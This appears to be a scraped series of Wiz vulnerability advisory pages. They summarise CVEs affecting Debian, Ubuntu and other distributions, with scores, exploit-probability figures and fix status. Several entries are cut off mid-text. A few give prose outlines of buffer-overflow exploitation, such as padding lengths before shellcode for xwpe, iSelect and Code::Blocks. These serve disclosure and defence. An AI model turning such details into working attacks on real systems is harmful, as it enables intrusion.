CVE-2026-23132 [MEDIUM] CVE-2026-23132 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-23132 :
Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
drm/bridge: synopsys: dw-dp: fix error paths of dw_dp_bind
Fix several issues in dw_dp_bind() error handling:
Missing return after drm_bridge_attach() failure - the function
continued execution instead of returning an error.
Resource leak: drm_dp_aux_register() is not a devm function, so
drm_dp_aux_unregister() must be called on all error paths after
aux registration succeeds. This affects errors from:
drm_bridge_attach()
phy_init()
devm_add_action_or_reset()
platform_get_irq()
devm_request_threaded_irq()
Bug fix: platform_get_irq() returns the IRQ number or a negative
error code, but the error path was returning ERR_PTR(ret) instead
of ERR_
Wiz
CVE-2025-33219 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.8
CVE-2025-33219 [HIGH] CVE-2025-33219 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-33219 :
Linux Debian vulnerability analysis and mitigation
NVIDIA Display Driver for Linux contains a vulnerability in the NVIDIA kernel module where an attacker could cause an integer overflow or wraparound. A successful exploit of this vulnerability might lead to code execution, escalation of privileges, data tampering, denial of service, or information disclosure.
Source : NVD
## 7.8
Score
Published January 28, 2026
Severity HIGH
CNA Score 7.8
Affected Technologies
Linux Debian
Linux Ubuntu
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 0.4
Exploitation Probability (EPSS) N/A
Affected packages and libraries
nvidia-graphics-drivers-535
nvidia-graphics-drivers
Sourc
Wiz
CVE-2025-11266 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.8
CVE-2025-11266 [MEDIUM] CVE-2025-11266 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-11266 :
Linux Debian vulnerability analysis and mitigation
An out-of-bounds write vulnerability exists in the Grassroots DICOM library (GDCM). The issue is triggered during parsing of a malformed DICOM file containing encapsulated PixelData fragments (compressed image data stored as multiple fragments). This vulnerability leads to a segmentation fault caused by an out-of-bounds memory access due to unsigned integer underflow in buffer indexing. It is exploitable via file input, simply opening a crafted malicious DICOM file is sufficient to trigger the crash, resulting in a denial-of-service condition.
Source : NVD
## 6.8
Score
Published December 12, 2025
Severity MEDIUM
CNA Score 6.8
Affected Technologies
Linux Debian
Echo
Has Public Exploit No
Has CISA KEV Explo
Wiz
CVE-2026-3184 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 3.7
CVE-2026-3184 [LOW] CVE-2026-3184 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-3184 :
Linux Debian vulnerability analysis and mitigation
login(1)
-h
PAM_RHOST
Source : NVD
## 3.7
Score
Published April 3, 2026
Severity LOW
CNA Score 3.7
Affected Technologies
Linux Debian
Linux Ubuntu
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 24
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
libmount-devel
libuuid-devel-32bit
Sources
NVD
Debian 11, 12, 13 Severity MEDIUM No Fix Added at: Mar 02, 2026
Debian 14 Severity LOW No Fix Added at: Mar 02, 2026
Echo Severity LOW Has Fix Added at: Mar 02, 2026
Ubuntu 25.10 Severity MEDIUM No Fix Added at: Mar 08, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your c
Wiz
CVE-2025-61654 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2025-61654 [MEDIUM] CVE-2025-61654 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-61654 :
Linux Debian vulnerability analysis and mitigation
Vulnerability in Wikimedia Foundation Thanks. This vulnerability is associated with program files includes/ThanksQueryHelper.Php.
This issue affects Thanks: from * before 1.43.4, 1.44.1.
Source : NVD
Published February 3, 2026
Severity NONE
CNA Score N/A
Affected Technologies
Linux Debian
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 23
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
mediawiki
Sources
NVD
Debian 13, 14 Has Fix Added at: Oct 05, 2025
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exploitable, not just what's listed.
Wiz
CVE-2026-3884 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2026-3884 [MEDIUM] CVE-2026-3884 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-3884 :
Linux Debian vulnerability analysis and mitigation
Versions of the package spin.js before 3.0.0 are vulnerable to Cross-site Scripting (XSS) via the spin() function that allows a creation of more than 1 alert for each 'target' element. An attacker would need to set an arbitrary key-value pair on Object.prototype through a crafted URL achieving a prototype pollution first, before being able to execute arbitrary JavaScript in the context of the user's browser.
Source : NVD
## 2
Score
Published March 11, 2026
Severity LOW
CNA Score 2.0
Affected Technologies
Linux Debian
Echo
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 9
Exploitation Probability (EPSS) N/A
Affecte
Wiz
CVE-2026-23328 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2026-23328 [MEDIUM] CVE-2026-23328 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-23328 :
Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
accel/amdxdna: Fix NULL pointer dereference of mgmt_chann
mgmt_chann may be set to NULL if the firmware returns an unexpected
error in aie2_send_mgmt_msg_wait(). This can later lead to a NULL
pointer dereference in aie2_hw_stop().
Fix this by introducing a dedicated helper to destroy mgmt_chann
and by adding proper NULL checks before accessing it.
Source : NVD
Published March 25, 2026
CNA Score N/A
Affected Technologies
Linux Debian
Linux Ubuntu
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 6.5
Exploitation Probability (EPSS) N/A
Affected package
Wiz
CVE-2025-15581 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 4.7
CVE-2025-15581 [MEDIUM] CVE-2025-15581 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-15581 :
Linux Debian vulnerability analysis and mitigation
Orthanc versions before 1.12.10 are affected by an authorisation logic flaw in the application's HTTP Basic Authentication implementation.
Successful exploitation could result in Privilege Escalation, potentially allowing full administrative access.
Source : NVD
## 4.7
Score
Published February 18, 2026
Severity MEDIUM
CNA Score 4.7
Affected Technologies
Linux Debian
Echo
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 14.1
Exploitation Probability (EPSS) N/A
Affected packages and libraries
orthanc
Sources
NVD
Debian 11, 14 Has Fix Added at: Feb 20, 2026
Debian 12, 13 No Fix Added at: Feb 20, 2026
Echo No F
Wiz
CVE-2023-54059 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2023-54059 [MEDIUM] CVE-2023-54059 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2023-54059 :
Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
soc: mediatek: mtk-svs: Enable the IRQ later
If the system does not come from reset (like when is booted via
kexec()), the peripheral might triger an IRQ before the data structures
are initialised.
[ 0.227710] Unable to handle kernel NULL pointer dereference at virtual address 0000000000000f08
[ 0.227913] Call trace:
[ 0.227918] svs_isr+0x8c/0x538
Source : NVD
Published December 24, 2025
CNA Score N/A
Affected Technologies
Linux Debian
Linux Ubuntu
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 6.8
Exploitation Probability (EPSS) N/A
Affected pack
Wiz
CVE-2026-5107 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2026-5107 [MEDIUM] CVE-2026-5107 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-5107 :
Linux Debian vulnerability analysis and mitigation
A vulnerability has been found in FRRouting FRR up to 10.5.1. This affects the function process_type2_route of the file bgpd/bgp_evpn.c of the component EVPN Type-2 Route Handler. The manipulation leads to improper access controls. The attack can be initiated remotely. The attack is considered to have high complexity. The exploitability is reported as difficult. The identifier of the patch is 7676cad65114aa23adde583d91d9d29e2debd045. To fix this issue, it is recommended to deploy a patch.
Source : NVD
## 2.3
Score
Published March 30, 2026
Severity LOW
CNA Score 2.3
Affected Technologies
Linux Debian
Linux Red Hat
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/
Wiz
CVE-2026-2474 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.5
CVE-2026-2474 [HIGH] CVE-2026-2474 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-2474 :
Linux Debian vulnerability analysis and mitigation
Crypt::URandom versions from 0.41 before 0.55 for Perl is vulnerable to a heap buffer overflow in the XS function crypt_urandom_getrandom().
The function does not validate that the length parameter is non-negative. If a negative value (e.g. -1) is supplied, the expression length + 1u causes an integer wraparound, resulting in a zero-byte allocation. The subsequent call to getrandom(data, length, GRND_NONBLOCK) passes the original negative value, which is implicitly converted to a large unsigned value (typically SIZE_MAX). This can result in writes beyond the allocated buffer, leading to heap memory corruption and application crash (denial of service).
In common usage, the length argument is typically hardcoded by the
Wiz
CVE-2025-62799 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.2
CVE-2025-62799 [HIGH] CVE-2025-62799 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-62799 :
Linux Debian vulnerability analysis and mitigation
fragmentSize
sampleSize
Source : NVD
## 7.2
Score
Published February 3, 2026
Severity HIGH
CNA Score 7.2
Affected Technologies
Linux Debian
Echo
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 5.9
Exploitation Probability (EPSS) N/A
Affected packages and libraries
fastdds
Sources
NVD
Debian 11, 12, 13 Severity MEDIUM No Fix Added at: Nov 19, 2025
Debian 14 Severity CRITICAL No Fix Added at: Nov 19, 2025
Echo Severity CRITICAL No Fix Added at: Nov 19, 2025
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exploitable, not just what's listed.
## Relate
Wiz
CVE-2026-2708 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2026-2708 [MEDIUM] CVE-2026-2708 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-2708 :
Linux Debian vulnerability analysis and mitigation
[libsoup: HTTP/1 request smuggling primitives accepted (CL.CL and TE+CL) in soup_headers_parse()]
Source : NVD
Published February 23, 2026
CNA Score N/A
Affected Technologies
Linux Debian
Linux Red Hat
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) N/A
Exploitation Probability (EPSS) N/A
Affected packages and libraries
libsoup-devel
libsoup-lang
Sources
NVD
Debian 11, 14 No Fix Added at: Feb 20, 2026
Debian 12, 13 Severity MEDIUM No Fix Added at: Feb 20, 2026
Echo No Fix Added at: Feb 20, 2026
Red Hat 6, 7, 8, 9, 10 Severity LOW No Fix Added at: Feb 20, 2026
Red Hat 7 Has Fix Added at: Feb 21, 2026
## Get a
Wiz
CVE-2025-68781 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz
CVE-2025-68781 CVE-2025-68781 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-68781 :
Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
usb: phy: fsl-usb: Fix use-after-free in delayed work during device removal
The delayed work item otg_event is initialized in fsl_otg_conf() and
scheduled under two conditions:
When a host controller binds to the OTG controller.
When the USB ID pin state changes (cable insertion/removal).
A race condition occurs when the device is removed via fsl_otg_remove():
the fsl_otg instance may be freed while the delayed work is still pending
or executing. This leads to use-after-free when the work function
fsl_otg_event() accesses the already freed memory.
The problematic scenario:
(detach thread) | (delayed work)
fsl_otg_remove() |
kfree(fsl_otg_dev) /
Wiz
CVE-2023-54151 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz
CVE-2023-54151 CVE-2023-54151 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2023-54151 :
Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
f2fs: Fix system crash due to lack of free space in LFS
When f2fs tries to checkpoint during foreground gc in LFS mode, system
crash occurs due to lack of free space if the amount of dirty node and
dentry pages generated by data migration exceeds free space.
The reproduction sequence is as follows.
20GiB capacity block device (null_blk)
format and mount with LFS mode
create a file and write 20,000MiB
4k random write on full range of the file
RIP: 0010:new_curseg+0x48a/0x510 [f2fs]
Code: 55 e7 f5 89 c0 48 0f af c3 48 8b 5d c0 48 c1 e8 20 83 c0 01 89 43 6c 48 83 c4 28 5b 41 5c 41 5d 41 5e 41 5f 5d c3 cc cc cc cc 0b f0 41 80 4f 48 04 45 85 f6 0f 8
Wiz
CVE-2016-20037 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.6
CVE-2016-20037 [HIGH] CVE-2016-20037 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2016-20037 :
Echo vulnerability analysis and mitigation
xwpe 1.5.30a-2.1 and prior contains a stack-based buffer overflow vulnerability that allows local attackers to execute arbitrary code by supplying overly long input strings that exceed buffer boundaries. Attackers can craft malicious command-line arguments with 262 bytes of junk data followed by shellcode to overwrite the instruction pointer and achieve code execution or denial of service.
Source : NVD
## 8.6
Score
Published March 28, 2026
Severity HIGH
CNA Score 8.6
Affected Technologies
Echo
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 3.7
Exploitation Probability (EPSS) N/A
Affected packages and libraries
xwpe
So
Wiz
CVE-2023-54162 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2023-54162 [MEDIUM] CVE-2023-54162 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2023-54162 :
Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
ksmbd: fix possible memory leak in smb2_lock()
argv needs to be free when setup_async_work fails or when the current
process is woken up.
Source : NVD
Published December 30, 2025
CNA Score N/A
Affected Technologies
Linux Debian
Linux Ubuntu
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 7.4
Exploitation Probability (EPSS) N/A
Affected packages and libraries
linux-xilinx-zynqmp
linux-azure-fips
Sources
NVD
Debian 12, 13, 14 Has Fix Added at: Dec 31, 2025
Echo Has Fix Added at: Dec 31, 2025
Ubuntu 16.04, 18.04 Severity MEDIUM No Fix Added at:
Wiz
CVE-2025-68203 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2025-68203 [MEDIUM] CVE-2025-68203 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-68203 :
Linux Debian vulnerability analysis and mitigation
Rejected reason: This CVE ID has been rejected or withdrawn by its CVE Numbering Authority.
Source : NVD
## 5.5
Score
Published December 16, 2025
Severity MEDIUM
CNA Score N/A
Affected Technologies
Linux Debian
Linux Ubuntu
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) N/A
Exploitation Probability (EPSS) N/A
Affected packages and libraries
linux-gcp-fips
linux-hwe-6.8
Sources
NVD
Debian 11, 12, 13 No Fix Added at: Dec 17, 2025
Debian 14 Has Fix Added at: Dec 17, 2025
Echo Has Fix Added at: Dec 17, 2025
Ubuntu 16.04, 18.04, 20.04, 22.04, 24.04, 25.10 Severity MEDIUM No Fix Added at: Dec 18, 2025
## Get
Wiz
CVE-2025-66043 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.8
CVE-2025-66043 [CRITICAL] CVE-2025-66043 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-66043 :
Linux Debian vulnerability analysis and mitigation
Several stack-based buffer overflow vulnerabilities exists in the MFER parsing functionality of The Biosig Project libbiosig 3.9.1. A specially crafted MFER file can lead to arbitrary code execution. An attacker can provide a malicious file to trigger these vulnerabilities.When Tag is 3
Source : NVD
## 9.8
Score
Published December 11, 2025
Severity CRITICAL
CNA Score 9.8
Affected Technologies
Linux Debian
Echo
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 35.3
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
biosig
Sources
NVD
Debian 11, 12, 13 Severity MEDIUM No Fix Added at: Dec 12, 20
Wiz
CVE-2025-29943 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 4.6
CVE-2025-29943 [MEDIUM] CVE-2025-29943 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-29943 :
Linux Debian vulnerability analysis and mitigation
Write what were condition within AMD CPUs may allow an admin-privileged attacker to modify the configuration of the CPU pipeline potentially resulting in the corruption of the stack pointer inside an SEV-SNP guest.
Source : NVD
## 4.6
Score
Published January 16, 2026
Severity MEDIUM
CNA Score 4.6
Affected Technologies
Linux Debian
Linux Ubuntu
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 0.4
Exploitation Probability (EPSS) N/A
Affected packages and libraries
amd64-microcode
Sources
NVD
Debian 11 No Fix Added at: Jan 20, 2026
Echo No Fix Added at: Jan 20, 2026
Ubuntu 16.04, 18.04, 20.04, 22.04, 24.04, 25.
Wiz
CVE-2025-67484 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2025-67484 [MEDIUM] CVE-2025-67484 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-67484 :
Linux Debian vulnerability analysis and mitigation
Vulnerability in Wikimedia Foundation MediaWiki. This vulnerability is associated with program files includes/Api/ApiFormatXml.Php.
This issue affects MediaWiki: from * before 1.39.16, 1.43.6, 1.44.3, 1.45.1.
Source : NVD
Published February 3, 2026
Severity NONE
CNA Score N/A
Affected Technologies
Linux Debian
Echo
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 9.9
Exploitation Probability (EPSS) N/A
Affected packages and libraries
mediawiki
Sources
NVD
Debian 11, 12, 13, 14 Has Fix Added at: Dec 12, 2025
Echo Has Fix Added at: Dec 12, 2025
## Get a CVE risk assessment
Get a prioritized view of CVEs in you
Wiz
CVE-2025-66045 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.8
CVE-2025-66045 [CRITICAL] CVE-2025-66045 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-66045 :
Linux Debian vulnerability analysis and mitigation
Several stack-based buffer overflow vulnerabilities exists in the MFER parsing functionality of The Biosig Project libbiosig 3.9.1. A specially crafted MFER file can lead to arbitrary code execution. An attacker can provide a malicious file to trigger these vulnerabilities.When Tag is 65
Source : NVD
## 9.8
Score
Published December 11, 2025
Severity CRITICAL
CNA Score 9.8
Affected Technologies
Linux Debian
Echo
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 35.3
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
biosig
Sources
NVD
Debian 11, 12, 13 Severity MEDIUM No Fix Added at: Dec 12, 2
Wiz
CVE-2023-54228 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2023-54228 [MEDIUM] CVE-2023-54228 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2023-54228 :
Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
regulator: raa215300: Fix resource leak in case of error
The clk_register_clkdev() allocates memory by calling vclkdev_alloc() and
this memory is not freed in the error path. Similarly, resources allocated
by clk_register_fixed_rate() are not freed in the error path.
Fix these issues by using devm_clk_hw_register_fixed_rate() and
devm_clk_hw_register_clkdev().
After this, the static variable clk is not needed. Replace it with
local variable hw in probe() and drop calling clk_unregister_fixed_rate()
from raa215300_rtc_unregister_device().
Source : NVD
Published December 30, 2025
CNA Score N/A
Affected Technologies
Linux Debian
Linux Ubuntu
H
Wiz
CVE-2020-37121 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.7
CVE-2020-37121 [MEDIUM] CVE-2020-37121 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2020-37121 :
Echo vulnerability analysis and mitigation
CODE::BLOCKS 16.01 contains a buffer overflow vulnerability that allows attackers to execute arbitrary code by overwriting Structured Exception Handler with crafted Unicode characters. Attackers can create a malicious M3U playlist file with 536 bytes of buffer and shellcode to trigger remote code execution.
Source : NVD
## 6.7
Score
Published February 5, 2026
Severity MEDIUM
CNA Score 6.7
Affected Technologies
Echo
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 22.3
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
codeblocks
Sources
NVD
Echo Severity MEDIUM No Fix Added at: Feb 08, 2026
## Get a
Wiz
CVE-2026-23387 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2026-23387 [MEDIUM] CVE-2026-23387 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-23387 :
Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
pinctrl: cirrus: cs42l43: Fix double-put in cs42l43_pin_probe()
devm_add_action_or_reset() already invokes the action on failure,
so the explicit put causes a double-put.
Source : NVD
Published March 25, 2026
CNA Score N/A
Affected Technologies
Linux Debian
Linux Ubuntu
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 6.3
Exploitation Probability (EPSS) N/A
Affected packages and libraries
linux-aws-6.8
linux-gkeop
Sources
NVD
Debian 13 No Fix Added at: Mar 26, 2026
Debian 14 Has Fix Added at: Mar 26, 2026
Ubuntu 22.04, 24.04, 25.10 Severity ME
Wiz
CVE-2025-68739 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2025-68739 [MEDIUM] CVE-2025-68739 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-68739 :
Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
PM / devfreq: hisi: Fix potential UAF in OPP handling
Ensure all required data is acquired before calling dev_pm_opp_put(opp)
to maintain correct resource acquisition and release order.
Source : NVD
Published December 24, 2025
CNA Score N/A
Affected Technologies
Linux Debian
Linux Ubuntu
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 6.8
Exploitation Probability (EPSS) N/A
Affected packages and libraries
linux-gcp-6.17
linux
Sources
NVD
Debian 14 Has Fix Added at: Dec 26, 2025
Ubuntu 16.04, 18.04, 20.04 Severity MEDIUM No Fix Added at: Dec 26
Wiz
CVE-2022-50708 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2022-50708 [MEDIUM] CVE-2022-50708 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2022-50708 :
Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
HSI: ssi_protocol: fix potential resource leak in ssip_pn_open()
ssip_pn_open() claims the HSI client's port with hsi_claim_port(). When
hsi_register_port_event() gets some error and returns a negetive value,
the HSI client's port should be released with hsi_release_port().
Fix it by calling hsi_release_port() when hsi_register_port_event() fails.
Source : NVD
Published December 24, 2025
CNA Score N/A
Affected Technologies
Linux Debian
Linux Ubuntu
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 6.8
Exploitation Probability (EPSS) N/A
Affected pack
Wiz
CVE-2025-68247 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2025-68247 [MEDIUM] CVE-2025-68247 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-68247 :
Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
posix-timers: Plug potential memory leak in do_timer_create()
When posix timer creation is set to allocate a given timer ID and the
access to the user space value faults, the function terminates without
freeing the already allocated posix timer structure.
Move the allocation after the user space access to cure that.
[ tglx: Massaged change log ]
Source : NVD
Published December 16, 2025
CNA Score N/A
Affected Technologies
Linux Debian
Linux Ubuntu
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 7.7
Exploitation Probability (EPSS) N/A
Affected packa
Wiz
CVE-2016-20048 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.6
CVE-2016-20048 [HIGH] CVE-2016-20048 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2016-20048 :
Echo vulnerability analysis and mitigation
iSelect 1.4.0-2+b1 contains a local buffer overflow vulnerability that allows local attackers to execute arbitrary code by supplying an oversized value to the -k/--key parameter. Attackers can craft a malicious argument containing a NOP sled, shellcode, and return address to overflow a 1024-byte stack buffer and gain code execution with user privileges.
Source : NVD
## 8.6
Score
Published March 28, 2026
Severity HIGH
CNA Score 8.6
Affected Technologies
Echo
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 6
Exploitation Probability (EPSS) N/A
Affected packages and libraries
iselect
Sources
NVD
Echo Severity HIGH No Fi
Wiz
CVE-2026-33144 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.8
CVE-2026-33144 [MEDIUM] CVE-2026-33144 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-33144 :
Linux Debian vulnerability analysis and mitigation
GPAC is an open-source multimedia framework. Prior to commit 86b0e36, a heap-based buffer overflow (write) vulnerability was discovered in GPAC MP4Box. The vulnerability exists in the gf_xml_parse_bit_sequence_bs function in utils/xml_bin_custom.c when processing a crafted NHML file containing malicious (BitSequence) elements. An attacker can exploit this by providing a specially crafted NHML file, causing an out-of-bounds write on the heap. This issue has been via commit 86b0e36.
Source : NVD
## 5.8
Score
Published March 20, 2026
Severity MEDIUM
CNA Score 5.8
Affected Technologies
Linux Debian
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Pro
Wiz
CVE-2025-54514 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 4.8
CVE-2025-54514 [MEDIUM] CVE-2025-54514 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-54514 :
Linux Debian vulnerability analysis and mitigation
Improper isolation of shared resources on a system on a chip by a malicious local attacker with high privileges could potentially lead to a partial loss of integrity.
Source : NVD
## 4.8
Score
Published February 10, 2026
Severity MEDIUM
CNA Score 4.8
Affected Technologies
Linux Debian
Amazon Linux
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 4.7
Exploitation Probability (EPSS) N/A
Affected packages and libraries
iwl7260-firmware
libertas-sd8787-firmware
Sources
NVD
Debian 11 No Fix Added at: Feb 11, 2026
Echo No Fix Added at: Feb 11, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in
Wiz
CVE-2025-68246 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2025-68246 [MEDIUM] CVE-2025-68246 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-68246 :
Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
ksmbd: close accepted socket when per-IP limit rejects connection
When the per-IP connection limit is exceeded in ksmbd_kthread_fn(),
the code sets ret = -EAGAIN and continues the accept loop without
closing the just-accepted socket. That leaks one socket per rejected
attempt from a single IP and enables a trivial remote DoS.
Release client_sk before continuing.
This bug was found with ZeroPath.
Source : NVD
Published December 16, 2025
CNA Score N/A
Affected Technologies
Linux Debian
Linux Ubuntu
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 11.6
Wiz
CVE-2025-68189 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz
CVE-2025-68189 CVE-2025-68189 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-68189 :
Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
drm/msm: Fix GEM free for imported dma-bufs
Imported dma-bufs also have obj->resv != &obj->_resv. So we should
check both this condition in addition to flags for handling the
_NO_SHARE case.
Fixes this splat that was reported with IRIS video playback:
------------[ cut here ]------------
